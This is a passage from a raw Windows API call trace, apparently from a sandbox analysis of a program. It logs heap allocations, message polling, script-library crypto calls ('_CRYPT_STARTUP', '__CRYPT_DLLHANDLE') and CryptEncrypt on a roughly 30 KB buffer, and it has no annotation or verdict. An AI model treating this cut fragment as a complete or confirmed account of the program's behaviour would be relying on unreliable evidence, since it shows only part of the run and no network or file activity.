hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0189.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0189.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0189.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0189.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0189.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0189.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0189.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0189.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0189.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0189.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0189.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0189.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0189.473] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0189.473] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.473] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0189.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0189.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26f8 [0189.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0189.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0189.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2778 [0189.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0189.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0189.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0189.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0189.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0189.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0189.474] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0189.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0d8 [0189.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0189.474] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0189.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0189.474] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0189.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0189.474] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0189.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0189.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0189.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0189.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0189.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0189.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0189.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0189.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0189.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0189.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1b0 [0189.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0189.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0189.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0189.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0189.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0189.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0189.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0189.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0189.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0189.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0189.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0189.475] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0189.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0189.475] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0189.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0189.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0189.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0189.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba1c8 [0189.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0189.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db408 [0189.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0189.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0189.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0189.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0189.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0189.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0189.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0189.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0189.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0189.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0189.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0189.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0189.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0189.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0189.476] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2848 [0189.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0189.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0189.476] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0189.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0189.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0189.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0189.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0189.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0189.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0189.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0189.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0189.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0189.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0189.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4f8 [0189.477] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0189.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0189.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0189.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defd8 [0189.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0189.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0189.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0189.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4f8 [0189.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0189.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0189.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0189.477] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0189.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0189.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0189.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0189.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0189.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0189.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2848 | out: hHeap=0x8a0000) returned 1 [0189.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0189.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2858 | out: hHeap=0x8a0000) returned 1 [0189.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4f8 | out: hHeap=0x8a0000) returned 1 [0189.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0189.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0189.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0189.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defd8 | out: hHeap=0x8a0000) returned 1 [0189.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0189.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0189.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0189.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0189.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0189.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0189.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0189.478] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0189.478] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27e8 [0189.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd498 [0189.479] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0189.479] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2858 [0189.479] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2738, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2738*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0189.479] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.479] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0189.479] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.479] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.479] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.479] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0189.479] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.479] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.479] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0189.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debf0 | out: hHeap=0x8a0000) returned 1 [0189.479] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0189.479] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.480] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0189.480] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0189.480] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0189.480] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.480] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0189.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0189.480] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0189.480] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0189.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0189.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba618 | out: hHeap=0x8a0000) returned 1 [0189.480] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.480] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.480] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.480] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.480] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0189.480] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.480] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0189.481] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.481] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.481] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x77e4, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x77f0) returned 1 [0189.481] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.481] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.481] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0189.481] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.481] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.481] CharLowerBuffW (in: lpsz="byte[30705]", cchLength=0xb | out: lpsz="byte[30705]") returned 0xb [0189.481] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.483] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.483] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.483] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0189.483] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0189.483] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.483] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xc007e8*, pdwDataLen=0x87e820*=0x77e4, dwBufLen=0x77f0 | out: pbData=0xc007e8*, pdwDataLen=0x87e820*=0x77f0) returned 1 [0189.484] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.484] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.484] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b058 | out: hHeap=0x8a0000) returned 1 [0189.484] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.487] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.487] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.487] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0189.487] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0189.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0189.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0189.487] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.487] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0189.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0189.487] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0189.487] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0189.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0189.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0189.487] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0189.487] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0189.487] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0189.487] PeekMessageW (in: lpMsg=0x87e7c4, 